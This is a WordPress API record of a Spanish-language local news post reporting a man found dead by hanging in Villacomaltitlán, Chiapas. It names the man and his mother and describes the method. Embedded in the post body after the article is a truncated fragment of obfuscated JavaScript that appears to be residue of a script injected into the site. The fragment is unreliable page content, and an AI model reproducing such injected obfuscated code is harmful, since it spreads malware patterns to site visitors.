{"id":2636,"date":"2022-06-06T02:22:22","date_gmt":"2022-06-06T02:22:22","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=2636"},"modified":"2022-06-06T02:22:23","modified_gmt":"2022-06-06T02:22:23","slug":"localizan-a-hombre-c0lgad0-en-villacomaltitlan","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=2636","title":{"rendered":"Localizan a hombre c0lgad0 en Villacomaltitl\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220605-WA0008-1024x768.jpg\" alt=\"\" class=\"wp-image-2637\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220605-WA0008-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220605-WA0008-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220605-WA0008-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/06\/IMG-20220605-WA0008.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 5 de junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este domingo  por la ma\u00f1ana fue localizado un hombre sin vida c0lgad0 de un techo de una vivienda del municipio de Villacomaltitl\u00e1n Los reportes oficiales dieron a conocer que, cerca de las 11 de la ma\u00f1ana se report\u00f3 el hallazgo en un domicilio localizado en el Ejido la Uni\u00f3n.Al arribo de las autoridades, Natividad de  56 a\u00f1os inform\u00f3 que al salir a la sala de la vivienda encontr\u00f3 a su hijo de nombre Juan Carlos de 33 a\u00f1os  colgado, estaba sujeto del cuello con una lazo de pl\u00e1stico hacia el techo de la casa.Inmediatamente llam\u00f3 a sus familiares quienes descolgaron el cuerpo pero ya no ten\u00eda vida. Dijo desconocer los motivos que lo llevaron a tomar la fatal decisi\u00f3n, e inform\u00f3 que el hombre padec\u00eda problemas de adicciones.Al lugar arribaron los peritos de la FGE para realizar las diligencias correspondientes.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 5 de junio del 2022. Tuxtla Guti\u00e9rrez. &#8211; Este domingo por la ma\u00f1ana fue localizado un hombre sin vida c0lgad0 de un techo de una vivienda del municipio de Villacomaltitl\u00e1n Los reportes oficiales dieron a conocer que, cerca de las 11 de la ma\u00f1ana se report\u00f3 el hallazgo en un domicilio localizado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":2637,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-2636","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2636","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2636"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2636\/revisions"}],"predecessor-version":[{"id":2638,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/2636\/revisions\/2638"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/2637"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2636"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2636"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2636"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}